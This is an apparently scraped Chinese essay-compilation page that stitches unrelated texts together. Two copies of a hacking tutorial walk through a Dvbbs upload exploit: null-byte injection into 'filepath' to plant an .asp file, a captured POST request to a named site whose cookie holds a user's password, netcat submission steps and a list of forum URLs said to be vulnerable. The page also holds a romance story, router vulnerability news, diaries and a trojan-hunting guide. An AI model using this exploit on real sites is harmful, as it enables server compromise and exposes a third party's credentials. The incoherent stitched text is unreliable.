上传漏洞终结篇讲解

时间:2022-10-05 07:43:44 其他范文 收藏本文 下载本文

上传漏洞终结篇讲解(精选10篇)由网友“你脑袋好圆”投稿提供,下面小编给大家整理后的上传漏洞终结篇讲解,欢迎阅读!

上传漏洞终结篇讲解

篇1:上传漏洞终结篇讲解

菜鸟知识点之上传漏洞终结篇:

一、写在前面

***这个上传漏洞利用的原理只是针对form格式上传的asp和php脚本***

NC(Netcat)

用于提交数据包

DOS界面下运行:

NC -vv www.***.com 80<1.txt

-vv: 回显

80: www端口

1.txt: 就是你要发送的数据包

(更多使用方法请查看本区的帖子)

WSE(WSockExpert)

对本机端口的监视,抓取IE提交的数据包

(不会用的就自己到网上搜资料N多)

二、漏洞原理

下面例子假设的前提

www主机: www.***.com;

bbs路径 : /bbs/

漏洞源于对动网上传文件的研究,建议有一定编程经验的

看看Dvbbs的upfile.asp文件,没有必要全部看懂

upfile是通过生成一个form表上传,如下

用到的变量:

filepath 默认值uploadface 属性hiden

act 默认值upload 属性hiden

file1 就是你要传的那个文件

关键是 filepath 这个变量!

默认情况下我们的文件上传到www.***.com/bbs/uploadface/

文件是用你的上传时间命名的,就是upfile里的这一句

FileName=FormPath&year(now)&month(now)&day(now)&hour(now)&minute(now)&second(now)&ranNum&“.”&FileExt

--------------------------------------

我们知道计算机里面的数据是一“”为标致的用过C语言的都知道

char data[]=“bbs”

这个data数组长度是4: b b s

如果我们构造filepath如下,会怎么样呢?

filepath=“/newmm.asp”

我们在.09.24.08.24传的文件就会发生变化

没有改时:

www.***.com/bbs/uploadface/200409240824.jpg

用我们构造的filepath时:

www.***.com/newmm.asp/200409240824.jpg

这样当服务器接收filepath数据时,检测到newmm.asp后面的

就理解为filepath的数据就结束了

这样我们上传的文件,比如c:1.asp

就保存成: www.***.com/newmm.asp

三、后期补充

漏洞公布以后很多网站做了相应的处理,但是对于filepath的过滤和处理都不行

有很多网站只是加了N个hiden属性的变量对付网上公布的upfile.exe就是那个

上传漏洞利用工具或者filepath变量利用工具(老兵的)...但是最基本的没改啊,。

而且很对网站的插件里有类似的漏洞,我要说的不要依赖哪些专门的工具

自己改WSE抓到的包里的filepath变量,然后在用NC提交。。。

就算他加N个hiden变量也于事无补。

当然,如果对filepath做了很严格的过滤的话我们的这些理论就将宣告终结

就是我们的新理论诞生的时候!

四、漏洞列表

dvd.3800cc.com/dispbbs.asp?BoardID=20&ID=5369

dvd.3800cc.com/dispbbs.asp?BoardID=20&ID=5530

dvd.3800cc.com/dispbbs.asp?BoardID=20&ID=5531

dvd.3800cc.com/dispbbs.asp?BoardID=20&ID=5693

dvd.3800cc.com/dispbbs.asp?BoardID=20&ID=5731

dvd.3800cc.com/dispbbs.asp?BoardID=20&ID=5746

监听外部主机

NC [-options] hostname port[s] [ports] ...

监听本地主机

NC -l -p port [options] [hostname] [port]

options:

-d detach from console, stealth mode

-e prog inbound program to exec [dangerous!!]

-g gateway source-routing hop point[s], up to 8

-G num source-routing pointer: 4, 8, 12, ...

-h this cruft

-i secs delay interval for lines sent, ports scanned

-l listen mode, for inbound connects

-L listen harder, re-listen on socket close

-n numeric-only IP addresses, no DNS

-o file hex dump of traffic

-p port local port number

-r randomize local and remote ports

-s addr local source address

-t answer TELNET negotiation

-u UDP mode

-v verbose [use twice to be more verbose]

-w secs timeout for connects and final net reads

-z zero-I/O mode [used for scanning]

port numbers can be individual or ranges: m-n [inclusive]

详细实例:

-----------------------------

一、WSE抓包结果(存到1.txt里):

POST /bbs/upPhoto/upfile.asp HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*

Referer: www.xin126.com/bbs/upPhoto/upload.asp

Accept-Language: zh-cn

Content-Type: multipart/form-data; boundary=-----------7d423a138d0278

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)

Host: www.xin126.com

Content-Length: 1969

Connection: Keep-Alive

Cache-Control: no-cache

Cookie: ASPSESSIONIDACCCCDCS=NJHCPHPALBCANKOBECHKJANF; isCome=1; GAMVANCOOKIES=1; regTime=2004%2D9%2D24+3%3A39%3A37; username=szjwwwww; pass=5211314; dl=0; userID=62; ltStyle=0; loginTry=1; userPass=eb03f6c72908fd84

篇2:菜鸟知识点 上传漏洞终结篇

一、写在前面

***这个上传漏洞利用的原理只是针对form格式上传的asp和php脚本***

NC(Netcat)

用于提交数据包

DOS界面下运行:

NC -vv www.***.com 80<1.txt

-vv: 回显

80: www端口

1.txt: 就是你要发送的数据包

(更多使用方法请查看本区的帖子)

WSE(WSockExpert)

对本机端口的监视,抓取IE提交的数据包

(不会用的就自己到网上搜资料N多)

二、漏洞原理

下面例子假设的前提

www主机: www.***.com;

bbs路径 : /bbs/

漏洞源于对动网上传文件的研究,建议有一定编程经验的

看看Dvbbs的upfile.asp文件,没有必要全部看懂

upfile是通过生成一个form表上传,如下

用到的变量:

filepath 默认值uploadface 属性hiden

act 默认值upload 属性hiden

file1 就是你要传的那个文件

关键是 filepath 这个变量!

默认情况下我们的文件上传到www.***.com/bbs/uploadface/

文件是用你的上传时间命名的,就是upfile里的这一句

FileName=FormPath&year(now)&month(now)&day(now)&hour(now)&minute(now)&second(now)&ranNum&“.”&FileExt

--------------------------------------

我们知道计算机里面的数据是一“”为标致的用过C语言的都知道

char data[]=“bbs”

这个data数组长度是4: b b s

如果我们构造filepath如下,会怎么样呢?

filepath=“/newmm.asp”

我们在2004.09.24.08.24传的文件就会发生变化

没有改时:

www.***.com/bbs/uploadface/200409240824.jpg

用我们构造的filepath时:

www.***.com/newmm.asp/200409240824.jpg

这样当服务器接收filepath数据时,检测到newmm.asp后面的

就理解为filepath的数据就结束了

这样我们上传的文件,比如c:1.asp

就保存成: www.***.com/newmm.asp

三、后期补充

漏洞公布以后很多网站做了相应的处理,但是对于filepath的过滤和处理都不行

有很多网站只是加了N个hiden属性的变量对付网上公布的upfile.exe就是那个

上传漏洞利用工具或者filepath变量利用工具(老兵的)...但是最基本的没改啊,。

而且很对网站的插件里有类似的漏洞,我要说的不要依赖哪些专门的工具

自己改WSE抓到的包里的filepath变量,然后在用NC提交。。。

就算他加N个hiden变量也于事无补。

当然,如果对filepath做了很严格的过滤的话我们的这些理论就将宣告终结

就是我们的新理论诞生的时候!

四、漏洞列表

dvd.3800cc.com/dispbbs.asp?BoardID=20&ID=5369

dvd.3800cc.com/dispbbs.asp?BoardID=20&ID=5530

dvd.3800cc.com/dispbbs.asp?BoardID=20&ID=5531

dvd.3800cc.com/dispbbs.asp?BoardID=20&ID=5693

dvd.3800cc.com/dispbbs.asp?BoardID=20&ID=5731

dvd.3800cc.com/dispbbs.asp?BoardID=20&ID=5746

监听外部主机

NC [-options] hostname port[s] [ports] ...

监听本地主机

NC -l -p port [options] [hostname] [port]

options:

-d detach from console, stealth mode

-e prog inbound program to exec [dangerous!!]

-g gateway source-routing hop point[s], up to 8

-G num source-routing pointer: 4, 8, 12, ...

-h this cruft

-i secs delay interval for lines sent, ports scanned

-l listen mode, for inbound connects

-L listen harder, re-listen on socket close

-n numeric-only IP addresses, no DNS

-o file hex dump of traffic

-p port local port number

-r randomize local and remote ports

-s addr local source address

-t answer TELNET negotiation

-u UDP mode

-v verbose [use twice to be more verbose]

-w secs timeout for connects and final net reads

-z zero-I/O mode [used for scanning]

port numbers can be individual or ranges: m-n [inclusive]

详细实例:

-----------------------------

一、WSE抓包结果(存到1.txt里):

POST /bbs/upPhoto/upfile.asp HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*

Referer: www.xin126.com/bbs/upPhoto/upload.asp

Accept-Language: zh-cn

Content-Type: multipart/form-data; boundary=-----------7d423a138d0278

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)

Host: www.xin126.com

Content-Length: 1969

Connection: Keep-Alive

Cache-Control: no-cache

Cookie: ASPSESSIONIDACCCCDCS=NJHCPHPALBCANKOBECHKJANF; isCome=1; GAMVANCOOKIES=1; regTime=2004%2D9%2D24+3%3A39%3A37; username=szjwwwww; pass=5211314; dl=0; userID=62; ltStyle=0; loginTry=1; userPass=eb03f6c72908fd84

-----------------------------7d423a138d0278

Content-Disposition: form-data; name=“filepath”

../medias/myPhoto/

-----------------------------7d423a138d0278

... ...

上传

---------------7d423a138d0278-----------------

二、UltraEdit打开1.txt改数据:

......

-----------------------------7d423a138d0278

Content-Disposition: form-data; name=“filepath”

/newmm.asp <===这个黑色代表一个空格是 0x20,改成0x00就可以了

......

----------------------------

三、重新计算cookies长度,然后nc提交

Nc -vv www.xin126.com 80 <1.txt

UltraEdit是一个16位编辑器网上可以下载得到

我们主要用来写那个结束标致: ====>16位表示:0x00或者00H

其实你改的时候就直接再filepath的结尾处加个00就OK了

计算cookies长度===>你把fillepath改了之后、肯定是或+或―cookies的长度变了

......

Host: www.xin126.com

Content-Length: 1969 <======就是这个

Connection: Keep-Alive

Cache-Control: no-cache

......

计算会吧?一个字母、数字就是1

对于上传漏洞提出的解决思路:(仅供参考)

1、一般的上传是把上传路径作为一个变量来处理

===>我们的对策就是把filepath变成常量,

。。

这个方法是目前最有效的(我认为的)

2、加强对于的处理,原来我们是读到这里就结束

我们继续读直道下一个变量开始的地方,处理就OK了

篇3:千年、等待(终结篇)

千年、等待(终结篇)(转载)

愈看此文,请先看上一部!

人界篇

当她的出现在他的面前时,他的感觉就是惊艳与那种强烈的熟悉感。

飘逸的黑色长发竟不可思议地泛着幽蓝的光泽,婴儿一般的肌肤有着白瓷般的光晕,还有那双眼眸竟然有着神秘的紫色,里面装满了令人看不透的点点柔情。最令人惊异的是她周身仿佛闪着白色光芒,纯洁得像个天使。

“你好,我是工藤羽雪,刚从美国回来,还请多多指教。”她优雅的鞠躬。

“嗯,啊,呃……”他惊讶得一时语塞了。

“这孩子!”与她同行的母亲笑着拍了他一下,“这是你工藤叔叔的女儿,今年要回国读书。要住在我们家里,怎么都不跟人家打招呼呢!太没礼貌了!”

他红着脸,放下手里的水杯,不好意思地说:“你、你好,我是司狼烈风,还请多多指教。”

“我把你的行李拿进去,羽雪,你就先和烈风认识认识吧!母亲挤挤眼,识趣地走开了。

司狼烈风只觉得紧张极了,好久才从嗓子冒出一句话:“呃,工藤,我们以前认识吗?总觉得你好眼熟……”

羽愣了一下,随后眯眯地笑道:“没有啊,我一直在美国!嗯,不用那么见外拉,叫我羽雪就好!”

“啊?好……”烈风不好意思地挠挠头。这回惨了,她一定觉得我像小混混一般说话了。

“那我也可以叫你烈风喽?”她突然站在他眼皮底下,吓了他一跳。“好……”烈风愣愣地说。

“谢谢!”羽雪高兴地笑了,烈风心里不自觉地痛了一下。

“羽雪,你住这间好不好?”楼上传来了伯母的喊声。“好!”羽雪“噔噔噔”地跑上楼去了。

烈,我来到你身边了,你感觉到我的存在了吗?羽在心里低低地问。

为什么,为什么我看到羽雪心里会有一种强烈的悸动?为什么?烈风呆呆地望着羽雪的背影。

“怎么样,学校生活还好吗?”放学一起回来的路上,烈风很体贴的问。

“还好啊,大家都很照顾我。”羽雪总是一副温暖人心的笑容,让人的视线舍不得移开。

“你很有名啊,才来学校一天,就已经被大家推上校花首座了呢!”烈风低头笑道,“不像我,总是没有人缘。”

不会啊,烈,你的长相还是跟以前一样,人也温柔啊,只是大家太喜欢这样的你,不敢惊扰罢了。羽望着烈风的侧脸,一时语塞了。

“嗨,烈风哥,不错嘛!这么快就和校花做朋友了!”突然间,一个爽朗的女孩从后面突袭了烈风,狠狠地拍了他的背,大声地笑道,随后逃之夭夭。

“她是谁啊,好可爱的女生。烈风……”羽抬起头问道。

“啊?哦,她是我的邻居,堇川晴……”烈风忽然回过神,不好意思地笑,“她很活泼,在男生中也很受欢迎呢!”

“烈……风?”羽抬起头看着他,目光里有着担心,“你也喜欢她?”不会吧,你是不会破坏我们之间的约定的,对不起,烈……

“呃?”烈风低着头看着羽雪的眼神,心痛得厉害。她痛啊,为什么会这么痛呢?那种眼神似乎在哪里看过,在哪里呢?想不起来,似乎是很久很久以前……

“烈风?”羽看到他的眼神有点不对,急忙叫道。

“啊?什么?”烈风的脸忽然变得通红,结结巴巴地说,“那、那个,羽雪,我还有事,我、我先走一步。”说完,他旋风般的逃离了。

烈风他没有回答我的问题……羽呆呆地站立着,心脏像被人捏住一样几乎要碎掉了,烈,你即使转生了也还是爱着我对吗?因为我们有着这样的约定啊!是不是,烈?

呼、呼、呼,烈风跑了很远一段路才停下来,急速喘着气。羽雪怎么会突然问我这个?难道真的发现我……可是,一看到羽雪那表情,我就无法思考任何事情,我和羽雪难道真的有什么牵连吗?

烈风在外面呆了一会儿,便向家走去,当他推开门的那一刹那,他似乎看到了羽雪的背上有一对翅膀,不由得惊呆了。

这是我的幻觉吗?总觉得羽雪很不平常啊!烈风瞪大着眼睛。

“咦,烈风你回来了啊!”羽雪发现站在玄关发楞的烈风后温柔的笑,“怎么,事办完了吗?”

“羽雪!”烈风忽然冲上来,一把抓住羽雪的手,“羽雪,我们,我们前世是恋人对不对?”

羽愣在那里,望着烈风不禁哑口无言好一会儿,她才低下头,笑了:“烈风……现在是科学时代耶……那怎么还信前世信今生这些东西?好可爱哦……”

“啊?”烈风突然回过神来,脸红透了,猛然松开羽雪的手:“哈哈,说的也是呢,对,对不起,我太冒失了,啊,我、我进去了!”说完他飞一般的跑上楼。

烈……羽痛苦地握紧了手,对不起,烈,我不能说,我什么都不能说……可是我还是爱你,所以现在的你也尽快喜欢上我吧……

一个月后,校外旅游。

“太好了,羽雪,我们被分到同一班车哦!”一个月下来,堇川晴和羽雪是非常好的朋友了。

“是啊。”羽雪笑眯眯的,望了一眼车后,“烈风也和我们在同一班车上呢!”

“咦?是吗?” 堇川晴忙四处张望,“哇,烈风哥旁边还有两个空位耶!羽雪,我们快去坐!不然会被其他女生抢走的!”说着,她已经拉着羽雪飞过去了。

烈风显然有些吃惊,不过他很高兴,因为旅途不再寂寞。

到了目的地,大家三三两两地分散开了。

樱花如雪如霞,恰如锦,嫩如颊,落英缤纷,铺了厚厚一层。

“这个地方好眼熟……”羽四处走着,慢慢地离开了人群。真的'好眼熟……走着走着忽然眼前一片空阔,只有一株十分古老的樱树孤独地立在那儿。

这里是……烈跟我说再见的地方……羽缓步向前,心脏开始狂跳起来,就是这个地方。烈送我冥界的古拉,实在是好傻的人呢……羽悲伤的幸福的笑着,走到树下,不禁伸手抚摸它,果然活得很久,是因为我和烈的血的原因吗?那么这课树也该有精灵了……

忽然响起一阵歌声:“心跳乱了节奏,梦也不自由,爱是个绝对承诺,不说,撑到一千年以后,放任无奈,淹没尘埃,我在废墟之中守着你走来,喔。我的泪光承载不了,喔。所有一切你要的爱,因为在一千年以后,世界早已没有我,无法深情挽着你的手,浅吻着你额头,别等到一千年以后,所有人都遗忘了我,那时红色黄昏的沙漠,能有谁,解开缠绕千年的寂寞……”

羽的眼泪轰然下落,扬起一片樱花。这是烈的声音,是烈!羽惊喜四处张望,烈,是你吗?是你回来了吗?不、不会的。烈,烈?羽最后在树后找到了唱歌的人。

是烈风。他倚着树干,闭上眼,低头吟唱着,似乎全然不知羽的到来,完全沉浸在自己的世界中,忽然觉得有雨落下,抬头一看才知是羽雪的眼泪大滴大滴地落下。

“咦?”烈风慌忙站起来,“羽雪,你怎么哭了!”

“啊,我哭了吗?”羽如梦初醒,慌乱地擦着眼泪,继而又笑了:“你怎么在这儿啊?”

“哦,我经常来这儿的。”烈风微笑着抚着树干,“小时候有一次在这边迷了路,不知不觉就走到这里了,以后就常来了,不知怎的,总觉得有种似曾相识的感觉,一闭上眼,就有一种模糊的记忆影像……对了,羽雪,你怎么也走到这儿来了?一般人都不知道有这个地方啊!”

羽温柔的笑了:“烈风,你在记忆的影像中看到了什么呢?”

“呃?”烈闭上眼努力地想,“好像是一对男女,不,好像是一对天使,浑身是血……啊,头好痛!每次都只能看到这些而已!”烈风使劲地捶着头,无奈地笑:“对不起,羽雪,我只能看到这些。”

“不,已经够了。”羽雪温柔地笑了。“这里,曾埋葬了一对天使的爱情,所以这儿的樱花格外凄凉美艳。现在我希望他们的爱情能在这儿重新发芽开花结果。你说对不对,烈风?”

“啊?”望着羽雪幸福的笑脸,烈风心中一阵抽搐,可是却无法理解她的话。

“烈风,刚才那首歌很好听,可以再唱一遍吗?”羽问。

“好啊。”两个人并肩坐在树下,只有烈风磁性深情的声音在空中飘荡渐渐传开。

……羽睡意朦胧,不觉地把头靠在了烈风的肩膀上,“烈……”

烈风忽然觉得全身颤抖起来,这种感觉是什么呢?仿佛触电一般,烈风看着羽雪的睡脸,霎时脑海中模糊的影像清晰起来,天使?羽雪为什么和记忆中的天使长得那么像?为什么……

校外旅行回来后,一个毁灭性的消息。

堇川晴向司狼烈风告白,而司狼烈风也答应了。

“呀哈!真是意外呢!” 堇川晴高兴地在羽雪面前说:“本以为一定会被拒绝呢!没想到烈风哥居然答应了!呀呼!我真是世界上最幸福的人!你说是不是,羽雪?呃,羽雪 ……”

羽雪坐在位置上呆呆地看着黑板,无法言语。烈,你……你……她的心像被瞬间掏空一样,一片空白,连呼吸都变得困难。“烈……烈……”一阵晕眩,羽雪晕倒在地。

“太好了!你醒了,我们差一点就要送你去医院了呢! 堇川晴长舒了一口气,“你怎么样?哪里不舒服?”烈风也不无担心地问。

“……”羽雪漠然地望着天花板,“保健老师呢?”

“啊,她在外面,说你一醒来就要叫她。她有话要跟你说!”说着,堇川晴已经跑去喊老师了。

“你赶紧回去上课吧,我没事……”羽仍然漠然的望着天花板。

“羽雪?”烈风看到她的反映,心里痛得厉害。“你们回去吧……”羽闭上眼睛。

“羽雪,老师来了哦!”堇川晴拉着老师大声说,“咦,烈风哥,你怎么要走了?”

“晴,走吧,让羽雪好好的休息。”烈风无奈地一笑,拉着她离开保健室。

老师走到床边坐下来,盯着闭上眼的羽,脸上的表情令人捉摸不定。

“米娜,有事吗?”羽比上眼睛忽然问。

篇4:路由器漏洞解决方法讲解

路由器漏洞是目前很多路由器存在的问题,于是我研究了一下路由器漏洞解决方法,在这里拿出来和大家分享一下,希望对大家有用,1月17日消息,据外电报道,安全专家发现了大多数家庭路由器漏洞。攻击者能够远程利用这个安全漏洞引诱连接到这种路由器漏洞的计算机访问一个陷阱网站。

这个路由器漏洞能够让攻击者把受害人引诱到诈骗网站。这些网站一般都伪装成银行、商务公司或者医疗结构等可信赖的网站。即使用户修改了路由器默认的口令,这个路由器漏洞也能够被利用。只要计算机安装了最新版本的AdobeFlash软件,无论这台计算机采用什么操作系统和什么浏览器,这个安全漏洞都能够被攻击者利用。

这个问题存在于通用即插即用功能中。用于家庭网络的大多数路由器都有这个功能,以便运行游戏、即时消息程序和其它应用程序的设备能够无缝地相互沟通,

通过让最终用户访问一个网站上的恶意Flash文件,攻击者能够利用这个即插即用技术对路由器进行重大的修改。可能进行的最严重的修改是修改连接到路由器的服务器电脑访问的网站。这将使受害者访问假冒的eBay或者美国银行网站,看到假冒的窃取他们登录证书的网页。

这个安全漏洞还能够让攻击者打开受害者的路由器上的端口。通过把这些端口发送给外部的服务器,攻击者能够把受害者的路由器变成类似于僵尸电脑的设备。研究人员称,这个问题不是Flash软件中的安全漏洞,而是即插即用功能中的设计路由器漏洞。这个功能没有使用身份识别技术。使用任何平台和浏览器的电脑都可以改变路由器的设置,只要这些电脑使用8.0版本以上的Flash软件。

研究人员称,Linksys、Dlink和SpeedTouch等公司生产的路由器已经证实存在这个路由器漏洞。其它厂商的产品也可能存在这种路由器漏洞。大多数路由器在默认状态下都打开了即插即用功能。防止这种攻击的唯一办法是关闭这个功能。有些路由器可以关闭这个功能,但是并不是所有的路由器都能关闭这个功能。

篇5:寒假日记系列(终结篇)

寒假日记系列(终结篇)

今天很累,具体来说是心累。明天就要回校,眼睛很疼,应该是光看手机屏幕引起的,疼痛的利害,脑子昏涨,吃晚饭是还心血来潮要好好写篇日志,猛然间就变了,就像村里的老爷爷说死就死。中午12点时收到一条短信“我今天就要离开了想了好久还是决定不给你打电话,你拨1259045568安5键听我的留言就会明白一切,不要回电我这是别人的手机发的信息~”就这些,我不便赘诉,就只用我的心情变化来了绝这条短信:些许惊讶~~不安~~无所谓~~阴痛~~颤抖~~迷惑兼愤怒~~猜疑,我也不想太累,任Ta去吧。自己写东西总爱写些伤感的东西。小鬼下午打电话来,我正在睡觉,我猜她肯定是要还我钱,急啥。眼痛的原因吧,流泪了,外边太吵了。晚上我把行李准备好了,明天早上7点钟的车。沉思,似乎我不会,对我来说就是脑中一片空白,有时在脑中想有一把刀子在割我的脑子,似乎特喜欢这种感觉,脑中的息肉一颤一颤的抖动,是那种痛苦无助,焦急无奈,喘着粗气仍翻不了身,鼻子酸楚眼睛湿润却又呼吸困难。昨晚没看到月亮,有云彩遮挡住了,说实话一切的节日都不适合我过。在这里,也算是为了给自己的寒假生活画个句号,我可爱的“寒假日记系列”到此结束。但我期待长假,它给我的伤害和愉快伴我走过了这段岁月,若问我后悔吗,我认为只有傻子才能回答出来,因为后悔是那么的无力,不后悔又是如此的无奈,不管后悔与否,我都会静候这段岁月慢慢的.沉淀,无论最终是腐朽的淤泥,还是耀眼的珍珠,都是人生回首时的一道风景,铭记着我们从生走向死亡的心路历程,镌刻抑或凝固了当时瑰艳的笑靥和伤情的泪水,把这一切都留遗在飘绪的回忆里,轻轻地卷起十几年的记忆,用一条绸带把它扎起,带着它,我们还要奔完余下的路程。挥挥手告别我可爱的“寒假日记系列”(“^”)

篇6:杀毒:木马通用解法终结篇

木马、病毒藏身之处:

注册表先说注册表,因为可能性是最大的`````打开RUN输入REGEDIT回车,看看下面几个位置:

HKEY-LOCAL-MACHINESoftwareMicrosoftWindowsCurrentVersionRun

HKEY-CURRENT-USERSoftwareMicrosoftWindowsCurrentVersionRun

这两个是最常见的,此外还有:

HKEY-LOCAL-MACHINESoftwareMicrosoftWindowsCurrentVersionRunonce

HKEY-CURRENT-USERSoftwareMicrosoftWindowsCurrentVersionRunonce

HKEY-LOCAL-MACHINESoftwareMicrosoftWindowsCurrentVersionRunonceEX

HKEY_CURRENT_USERSoftwareMicrosoftWindowTCurrentVersionWindowsload

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowTCurrentVersionWinlogonUserinit

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionPoliciesExplorerRun

HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerRun

HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRuervicesOnce

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRuervicesOnce

HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRuervices

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRuervices

HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRunOnceSetup

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunOnceSetup

木马通常会有一个比较〖猥琐〗的名称,迄今为止,我还没见过哪只马敢在注册表里用Trojan命名的,哈哈`~`````所以查找的时候一定要细心,如果觉得可疑但不确定,就应该询问高手,或借用第三方软件,

另外,还有两个地方比较容易被忽视哦:

HKEY-CLAES-ROOTexefilesshellopencommand

HKEY-LOCAL-MACHINESoftwareCLAESexefilesshellopencommand

这可是关联型木马的俱乐部。

win.ini文件

win.ini是在WINDOWS下的引导文件,其中的自段“run=”和“load=”木马程序喜欢驻留的地方,如后这两个字段后跟了不明文件路径,那你要小心了,你有可能中招了,

用NT的朋友可能会找不到这两个字段,因为WIT下的这个文件是类似于这样的:

;for6-bitasuort

[fonts]

[exteio]

[mciexteio]

[files]

[Mail]

MAPI=

[MCIExteio.BAK]

asf=MPEGVideo

asx=MPEGVideo

ivf=MPEGVideo

mu=MPEGVideo

mpv=MPEGVideo

mp=MPEGVideo

mpv=MPEGVideo

wax=MPEGVideo

wm=MPEGVideo

wma=MPEGVideo

wmv=MPEGVideo

wvx=MPEGVideo

wmx=MPEGVideo

system.ini在WIN98系统的system.ini文件中,在[BOOT]下面有个“shell=文件名”。正确的文件名应该是“explorer.exe”,如果不是“explorer.exe”,而是“shell=explorer.exe程序名”,那么后面跟着的那个程序可能就是“木马”程序。

与程序捆绑

这里的捆绑也包括了插入。有的木马可能会捆绑程序,就是说它会集成到程序里,一旦用户激活木马程序,那么木马文件和某一应用程序捆绑在一起,然后上传到服务端覆盖原文件,这样即使木马被删除了,只要运行捆绑了木马的应用程序,木马又会被安装上去了。绑定到某一应用程序中,如绑定到系统文件,那么每一次Windows启动均会启动木马。这种木马是比较难发现的,但是一般杀毒软件的监控功能能够发现这种病毒,并且我在《浅谈加密技术》中提到的MD5校验也可以发现,前提是你对干净的系统文件做过MD5运算。碰到这种情况,我会用两种办法,如果不是致命的程序,可以采用替换文件或杀毒软件查杀,如果是致命的文件,那就只能FORMAT重装了~```呵呵```

Witart.batWitart.bat也是一个能自动被Windows加载运行的文件,它多数情况下为应用程序及Windows自动生成,在执行了Win.com并加载了多数驱动程序之后开始执行(这一点可通过启动时按F8键再选择逐步跟踪启动过程的启动方式可得知)。由于Autoexec.bat的功能可以由Witart.bat代替完成,因此木马完全可以像在Autoexec.bat中那样被加载运行,危险由此而来。

Recycled文件夹

什么?你用的是WIN000但你没看到过这个文件夹?``````哦`````回收站总见过吧````哈哈```开个玩笑,这个文件夹就等同于回收站,在每个硬盘的根目录下都有,但需要在工具D文件夹选项里选择查看所有文件,因为默认是隐藏的。咋样,是个藏木马的好地方吧。

程序D启动

打开程序D启动,你肯定在想没这么笨的木马吧`~``呵呵,别人当然不会笨到一点也不伪装就直接加在启动里。这里通常会结合上面说的“与程序捆绑”或别的方式来进行伪装,从而名目张胆的在你眼皮底下启动。

最后,说一种比较通用的分析方法:(小妖已经被我教过了```呵呵)在安装完Windows后,点击“开始→程序→附件→系统工具→系统信息”,在打开的“系统信息”窗口中再点击“软件环境→正在运行任务,然后点击“操作→另存成文本文件”,以后系统出现异常时则对照进行分析。另外,“优化大师”也提供了保存进程快照的功能```````

大概~`基本``~也许``~可能``就只有这么多了:)``````这里叫终结篇并不表示除此之外便无木马容身之地,任何技术都是在一直发展的,木马永远不可能被完全终结。但是,我希望新手看过这篇贴后,能够具备把自己电脑里木马终结掉的能力。

篇7:军训日记の终结篇记

军训日记の终结篇记

军训日记の终结篇记 (中国大学网 unjs.com) 军训日记の苦笑篇 09国贸由一开始嘎不相识.. 到大家建立感情.. 到大家一齐俾教官罚..俾师兄师姐罚... 到三哥猜输要拆散我地班嘎失望 到大家分享系各方队嘎趣事 到大家一齐就甘参加歌咏比赛...仲挪了第二 到大家一齐见某人就唱吖..纪律,,纪律....哈哈 到送教官 到........ 系呢16日里边..我地曾在一齐开心过.快乐过..不舍过...哭过...笑过... 我地要永远都记住大学开始嘎呢一幕,,,,,,照片描述:13号那天游学校同埋金融班嘎合影 军训日记の亲亲家人篇 呢次系我人生最后一次军训....16天..! 我要多谢我嘎亲亲家人..个个都好支持.关心我.... 我嘎爸爸妈妈....日日都打几次电话俾我...送野食来俾我.,,仲买定礼物话送我熬完军训的..去旅游也不忘了我的手信... 阿城....知你初三好赶嘎时间..一唔使返学就发sms俾我.... 杰少....仲要你开解我呢个做表姐嘎,,,真失礼...多谢你吖介绍...~ 恒哥仔...知道系英国都好忙...仲要经常出入手术室...但系你都经常打俾我....我仲发过你脾气...soli吖... 仲有我甘多位朋友们....支持过我嘎朋友们...我可以坚持到呢16日...我真的.很感谢你们嘎支持..!~照片描述:准备上学的第一天..来.笑一个!~照片描述:一入房就睇到我未拆嘎礼物啦...哈哈 照片描述:哈哈..我心急到马上打开距..哈哈 一睇就知我候琴啦..哈哈 军训日记の教官篇 我都算威水..跟过好多个教官.... 首先系我地19国贸嘎....三哥.... 跟住系特色方队嘎.....山贼教官.. 仲有会计1班嘎...唔知俾咩表情距嘎木独教官... 仲有最后......特好人...特好人嘎..青哥..!!! 谢谢你们了...有你地陪伴我地走过呢人生难忘嘎一段日子.... 还记得军训的16天...我们曾风雨同路..! 唉..最唔抵就唔可以同明哥哥同潇洒哥合影啦...经管嘎靓仔教官吖... 军训日记の师兄师姐篇 我地09国贸嘎带班师兄师姐..个个都好负责..好好人... 距地有楚红啦..楚华啦...振波啦..标标啦..林伟啦...根祥啦... 我都做过2日病号...多谢你地嘎关心吖...~ 照片描述:我地国贸嘎教官同埋师兄师姐 军训日记の经典口号篇 d教官唔钟意食学校d菜...所以我地经管嘎有个土豆教官..有个南瓜饼教官..有大白菜.. 一行正步..就自己系度叫土豆丝..土豆丝:南瓜饼..南瓜饼..哈哈 仲有同其他系嘎斗.....过日系停车厂..同埋计机嘎嗌.... 我地听唔到距地话我地经管什么啦... 跟住我地话距地计算机..正傻B计机,.,正垃圾:计算机.正傻b..没出息...甘都斗餐 酒管嘎就俾人话..酒鬼酒鬼..脑子进水..:酒管酒管..回家洗碗 经管就俾人话经管经管..专修水管 电子、电子,没电就死 哈哈..笑死 军训日记の生活篇 我地宿舍8个人...2房1厅....我地算系生活愉快的.. 睇睇我地内务检查过日空空如也嘎宿舍.. 照片描述:我地宿舍嘎100蚊12桶嘎...水 仲有我地要着嘎回力..好似我地嘎肤色甘由军训前嘎白边黑了.. 睇来距都要肤下美即嘎mask啦...哈哈 小k话...夜晚睇回力都系nike嗟..我地系中国着回力就好似系法国着cons..哈哈... 仲记得过日影军训大合照...美女们话....唉..晒到黑嘛嘛..点肥猪流吖..哈哈 